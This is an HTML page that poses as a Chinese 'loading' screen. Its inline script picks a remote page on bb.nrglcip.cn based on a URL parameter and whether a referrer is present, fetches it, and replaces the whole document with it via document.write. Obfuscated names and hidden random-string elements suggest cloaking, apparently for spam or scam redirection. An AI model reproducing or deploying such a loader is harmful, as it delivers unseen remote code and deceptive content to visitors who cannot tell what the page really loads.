<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nAG1IQizk1j {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nAG1IQizk1j .VNOigCcFqq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nAG1IQizk1j .content {
            line-height: 50px;
            text-align: center
        }

        .nAG1IQizk1j .img {
            width: 100%
        }

        .nAG1IQizk1j .SMoNBjiS {
            text-align: center
        }

        .nAG1IQizk1j .SMoNBjiS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nAG1IQizk1j .SMoNBjiS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nAG1IQizk1j .SMoNBjiS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nAG1IQizk1j .SMoNBjiS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nAG1IQizk1j .SMoNBjiS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nAG1IQizk1j .SMoNBjiS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nAG1IQizk1j .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KaQCq1tU48ya(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NY0wz = KaQCq1tU48ya('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NY0wz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NY0wz +".html?a=share";
		}
		
        swcWsVU5L6=url+"#"+new Date().getTime();
        swcWsVU5L6 && function() {
            $.get(swcWsVU5L6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >m7Pn543q0Fob4oQoN2i0Q08UveAAv1vKDsuvyA4cF7U7NyDghM</li>
<p  style='display:none'>f2Y7HJ3ejoxj9ohrCj5x8Vz4AlqaLh3QU5mYchzuCsCgcbU6aMQmGEkyjQ8rV8kKiwfL4Ho1b3ruh2bxXowIDcJxAIBM7ZfiI</p>
<a  href='#' style='display:none'>zxQnYtYKYPDB</a>
<div style='display:none'>lliY0QRShMB1MTg7xVGjoIHUElGqkfKSciZ</div><div class="nAG1IQizk1j">
    <div class="VNOigCcFqq">
        <div class="SMoNBjiS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >r5kni9jSxtoL5hEy0nJHQMqQNUI8Sg4a4siSBXP687GwXe509LeI2VNO78W3vEv2</ul>
<a  href='#' style='display:none'>XOpR1Yyd0gPFejU03PFRsecH6rz5DmB4iZfHF6nrhRO4zUlo6Njho82BXg3U49amYth7rJ5ePW</a>
<img  src='' style='display:none'>
<li style='display:none' >ChPXblTi1WfLyTwX95RGHXWpqwRGFMDCUSBtKHwoLouysFxVf</li>
<ul style='display:none' >r5kni9jSxtoL5hEy0nJHQMqQNUI8Sg4a4siSBXP687GwXe509LeI2VNO78W3vEv2</ul>
<li style='display:none' >ChPXblTi1WfLyTwX95RGHXWpqwRGFMDCUSBtKHwoLouysFxVf</li></body>
</html>